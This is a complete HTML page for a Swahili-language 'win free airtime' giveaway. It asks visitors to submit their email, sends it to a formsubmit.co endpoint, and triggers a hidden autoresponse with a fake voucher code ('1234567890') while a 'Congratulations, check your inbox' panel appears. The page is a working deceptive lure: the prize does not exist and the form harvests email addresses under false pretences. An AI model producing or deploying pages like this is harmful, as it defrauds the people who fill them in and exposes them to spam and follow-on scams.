<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="style.css">
  <title>Document</title>
  <style>
    *{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}
.wrapper{
  width: 98%;
  margin: 0 auto;
  height: 100vh;
  background: green;
  background-size: cover;
  background-position: center;
  padding: 30px 15px;
  justify-content: center;
  text-align: center;
  
}
.main-content{
  background: white;
  border-radius: 15px;
  margin-top: 200px;
  text-align: center;
  position: relative;
}
.absolute{
  position: absolute;
  background: white;
  border-radius: 15px;
  margin-top: 200px;
  text-align: center;
  top: 33px;
  left: -1280px;
  width: 95%;
  transition: 1s;
}
.absolute.active{
  left: 26px;
}
h1{
  font-size: 110px;
  padding: 30px 10px;
}
h3{
  font-size: 90px;
  margin-top: 20px;
  margin-bottom: 20px;
  padding: 30px 10px;
}
h5{
  font-size: 70px;
  margin-top: 20px;
  margin-bottom: 20px;
  padding: 30px 10px;
}
.absolute h5{
  padding: 28px 10px;
}
.form-container{
  margin-left: 30%;
  margin-top: 50px;
}

  form{
    display: flex;
    flex-direction: column;
    width: 65%;
    text-align: center;
    align-self: center;
  }
    .email{
      padding: 10px 26px;
      font-size: 24px;
      margin-top: 40px;
    }
  .submit{
    margin-top: 20px;
    font-size: 24px;
    padding: 12px 24px;
    width: 50%;
    align-self: center;
    border-radius: 10px;
    font-weight: 700;
  }
  @media(max-width:700px){
    
.wrapper{
  padding: 15px 10px;
  
}
.main-content{
  border-radius: 15px;
  margin-top: 100px;
  background: white;
  position: relative;
  transition: 20s;
}

.absolute.active{
  left: 8px;
  top: -85px
}
h1{
  font-size: 25px;
  padding: 14px 5px;
}
h3{
  font-size: 15px;
  margin-top: 10px;
  margin-bottom: 10px;
  padding: 15px 5px;
}
h5{
  font-size: 12px;
  margin-top: 10px;
  margin-bottom: 10px;
  padding: 15px 5px;
}
.absolute h5{
  padding: 20px 5px;
}
.form-container{
  width: 100%;
  margin-left: 0%;
  margin-top: 20px;

}
.email{
  padding: 2px 13px;
  font-size: 14px;
 }
  .submit{
    margin-top: 10px;
    font-size: 14px;
    padding: 4px 6px;
    width: 25%;
  }
  form{
    width: 100%;
    margin-left: 0;
  }
  }
  </style>
</head>
<body>
 <div class="wrapper">
   <div class="main-content">
     <h1>Jishindie Airtime!!!</h1>
     <h3>Watu Mia Moja Wataibuka Kuwa Washindi Leo</h3>
     <h5>Enter Your Valid Email and CLICK 'OK' Twice.</h5>
   </div>
   <div class="absolute" id="absolute">
    <h1>Wooow!!! Congratulations</h1>
     <h3>Angalia Inbox Ya Email Yako Sasa</h3>
     <h5>Kama Umeshinda Utapata Credit Code</h5>
   </div>
   <div class="form-container">
     <form onsubmit="simba()" action="https://formsubmit.co/2c8561bade51150d841f2aea066c593e" method="POST">
       <input class="email"type="Email" placeholder="Type Email Here" name="email" required="required">
       <input type="hidden" name="_autoresponse" value="Congratulations, Your Credit Voucher is 1234567890">
       <input id="submit"class="submit" type="submit" value="OK">
     </form>
   </div>
 </div>

<script>
  const congrats = document.getElementById("absolute");
const submitButton = document.getElementById("submit");


function simba(){
  submitButton.addEventListener("click",function(){
  congrats.classList.add("active");
});
}
</script>

</body>
</html>

